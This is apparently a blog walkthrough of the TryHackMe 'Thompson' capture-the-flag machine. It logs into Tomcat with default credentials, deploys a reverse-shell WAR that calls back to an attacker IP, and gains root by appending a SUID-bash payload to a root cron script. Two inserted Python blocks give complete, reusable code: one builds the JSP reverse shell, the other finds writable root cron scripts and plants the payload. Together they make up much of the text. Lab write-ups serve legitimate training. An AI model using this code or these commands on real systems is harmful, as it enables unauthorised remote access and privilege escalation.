TryHackMe: Thompson CTF Walkthrough
Hello Readers! Today I walk through the Thompson CTF machine from TryHackMe. The room is simple and fun: it covers basic penetration testing and privilege escalation. The goal is to get two flags, from user.txt and root.txt.
The first thing to do, as always, is connect your machine to the TryHackMe network through the VPN.
Enumeration And Findings
Once I have the target IP address, I wait 2-3 minutes so that the machine can boot properly.
Let us start our enumeration as usual with nmap (-oA needs an output basename, here thompson, before the target):
nmap -sC -sV -oA thompson <IP>
Let's check the HTTP port, 8080 here. Opening the page shows the Tomcat server that the nmap scan results also identified.
Looking around the page, I find links to Server Status, Manager App and Host Manager.
Let me check them.
These pages look promising, but they ask for credentials, and I don't have any yet, so I click the Cancel button on the login prompt.
After pressing Cancel, the error page that Tomcat returns shows example login details. So, let me try them.
Username: tomcat
Password: s3cret
Wow! The default username and password work. Now I need a shell on the box, so let me create a reverse shell and upload it here.
Scrolling down the Manager App page, I find the upload section, which requires a .war file.
So the idea is to build the reverse shell as a WAR file using msfvenom.
For the reverse shell, LHOST is my own (VPN) IP address and LPORT is the port my listener will wait on.
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.8.77.36 LPORT=1234 -f war > jspshell.war
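The same kind of WAR can be built without msfvenom, which also shows what the manager application actually deploys: a zip archive with a WEB-INF/web.xml and a JSP that connects back and pipes a /bin/sh process over the socket. The block below is an added example, not code from the walkthrough or from Metasploit; the JSP file name shell.jsp, the welcome-file web.xml and the helper names are my own choices, and the LHOST/LPORT defaults are the values used above.

```python
# Added example (not from the original walkthrough): build a JSP reverse-shell
# WAR with the standard library only. Assumptions: the JSP is named shell.jsp
# (msfvenom uses a random name) and Tomcat serves it as the welcome page of
# the application, so browsing to /<war name>/ triggers it.
import io
import zipfile

# JSP scriptlet: connect back to LHOST:LPORT and pump bytes between the socket
# and a /bin/sh child process (same idea as java/jsp_shell_reverse_tcp).
JSP_TEMPLATE = r"""<%@ page import="java.io.*,java.net.*" %>
<%
Socket sock = new Socket("__LHOST__", __LPORT__);
Process proc = new ProcessBuilder("/bin/sh").redirectErrorStream(true).start();
InputStream procOut = proc.getInputStream();
InputStream sockIn = sock.getInputStream();
OutputStream procIn = proc.getOutputStream();
OutputStream sockOut = sock.getOutputStream();
while (!sock.isClosed()) {
    while (procOut.available() > 0) sockOut.write(procOut.read());
    while (sockIn.available() > 0) procIn.write(sockIn.read());
    sockOut.flush();
    procIn.flush();
    try { Thread.sleep(50); } catch (InterruptedException e) { break; }
    try { proc.exitValue(); break; } catch (IllegalThreadStateException e) { /* still running */ }
}
proc.destroy();
sock.close();
%>
"""

# Minimal deployment descriptor: make the JSP the welcome file of the webapp.
WEB_XML_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee" version="3.1">
  <welcome-file-list>
    <welcome-file>__JSP__</welcome-file>
  </welcome-file-list>
</web-app>
"""


def build_war(lhost, lport, jsp_name="shell.jsp"):
    """Return the bytes of a WAR whose welcome page is the reverse-shell JSP."""
    jsp = JSP_TEMPLATE.replace("__LHOST__", lhost).replace("__LPORT__", str(int(lport)))
    web_xml = WEB_XML_TEMPLATE.replace("__JSP__", jsp_name)
    buf = io.BytesIO()
    # A WAR is just a zip file; Tomcat reads WEB-INF/web.xml from it.
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", web_xml)
        war.writestr(jsp_name, jsp)
    return buf.getvalue()


def war_entries(war_bytes):
    """List the archive members, a quick sanity check before uploading."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return sorted(war.namelist())


def read_entry(war_bytes, name):
    """Return one archive member as text, e.g. to confirm LHOST/LPORT."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        return war.read(name).decode()


if __name__ == "__main__":
    data = build_war("10.8.77.36", 1234)
    with open("jspshell.war", "wb") as f:
        f.write(data)
    print("wrote jspshell.war containing", war_entries(data))
    print("start the listener first (for example nc -lvnp 1234), then browse to /jspshell/")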
Now it is time to upload this shell.
Click Browse..., select the correct file, jspshell.war, and click Deploy. The WAR is uploaded and the new application appears in the list as /jspshell.
Now it's time to access it through the web browser.
Before that, I must start a listener on my machine on the port chosen above (1234) so that the target can connect back to it.
Once everything is set, I click /jspshell in the application list; that runs the uploaded JSP on the target.
The browser page stays blank, which is expected: the shell output goes to the listener running on my local system, so that is where I look.
I got the shell.
The reverse shell gives me only user-level access, which is enough to find user.txt, but root.txt still needs privilege escalation.
Next I upgrade to an interactive TTY so that I can work more comfortably:
python -c 'import pty; pty.spawn("/bin/sh")'
With that, I have the user flag; now I must do the privilege escalation.
While looking around I also find a file named id.sh with full (rwx) permissions for everyone, so any user can modify it. Looks interesting!
Now I need to enumerate id.sh further.
Here is what I found.
A cron job runs id.sh every minute, and it runs as root.
This sounds interesting!
So if I append a command to id.sh, the next time cron runs the script as root, my command runs as root too.
Here is what I appended:
echo 'cp /bin/bash /tmp/bash; chmod +s /tmp/bash' >> /home/jack/id.sh
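The same check, generalised a little, as an added example that is not part of the walkthrough: parse the system crontab, resolve the files each root job runs (honouring a leading "cd DIR &&", which is how id.sh is reached), keep the ones the current user can write, and append the payload used above. The sample crontab lines and the temporary id.sh are constructed for the example; on the target you would feed it the real /etc/crontab.

```python
# Added example (not from the original walkthrough): find scripts that a root
# cron job runs and that the current user can write, then append the same
# SUID-bash payload the walkthrough uses. The crontab text and script used in
# the test are constructed; on the target, read /etc/crontab itself.
import os
import re
import shlex

# /etc/crontab format: five schedule fields, the user to run as, then the command.
SYSTEM_CRON_RE = re.compile(r"^(\S+\s+){5}(?P<user>\S+)\s+(?P<cmd>.+)$")

# The command the walkthrough appends: a root-owned copy of bash with the SUID bit.
PAYLOAD = "cp /bin/bash /tmp/bash; chmod +s /tmp/bash\n"


def parse_system_crontab(text):
    """Return (user, command) pairs, skipping comments and VAR=value lines."""
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        m = SYSTEM_CRON_RE.match(line)
        if m:
            jobs.append((m.group("user"), m.group("cmd")))
    return jobs


def referenced_files(cmd):
    """Resolve the existing files named in a cron command.

    A leading 'cd DIR &&' changes the directory that relative names such as
    'bash id.sh' are resolved against, which is exactly the Thompson pattern.
    """
    cwd = "/"
    found = []
    for segment in re.split(r"&&|\|\||;", cmd):
        try:
            words = shlex.split(segment)
        except ValueError:
            continue
        if not words:
            continue
        if words[0] == "cd" and len(words) > 1:
            cwd = words[1]
            continue
        for word in words:
            if word.startswith("-"):  # option flag, not a file
                continue
            path = word if os.path.isabs(word) else os.path.join(cwd, word)
            if os.path.isfile(path):
                found.append(path)
    return found


def writable_root_cron_scripts(crontab_text):
    """Files run by root's cron jobs that the current user may modify."""
    hits = []
    for user, cmd in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        for path in referenced_files(cmd):
            if os.access(path, os.W_OK) and (path, cmd) not in hits:
                hits.append((path, cmd))
    return hits


def plant_payload(script_path, payload=PAYLOAD):
    """Append the payload on its own line and return the script's new contents."""
    with open(script_path) as f:
        current = f.read()
    if current and not current.endswith("\n"):
        current += "\n"  # do not glue the payload onto the last existing line
    with open(script_path, "w") as f:
        f.write(current + payload)
    return current + payload


if __name__ == "__main__":
    with open("/etc/crontab") as f:
        for path, cmd in writable_root_cron_scripts(f.read()):
            print(f"writable root cron script: {path}  (job: {cmd})")
    # After planting the payload, wait for the next minute, then run: /tmp/bash -p
```

Once the payload has run, the copy in /tmp must be started with the -p option: without it bash notices that the effective UID differs from the real UID and drops the privilege before you get a prompt.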
After waiting a minute for the cron job to run, /tmp/bash exists with the SUID bit set; running it with the -p option keeps the root effective UID, and I am root!
I can do anything now.
Now I go for both flag values.
Here I got the user.txt
Here I got the root.txt.
HURRAY!!! I got both flags.
Thanks for reading and I hope you liked this blog.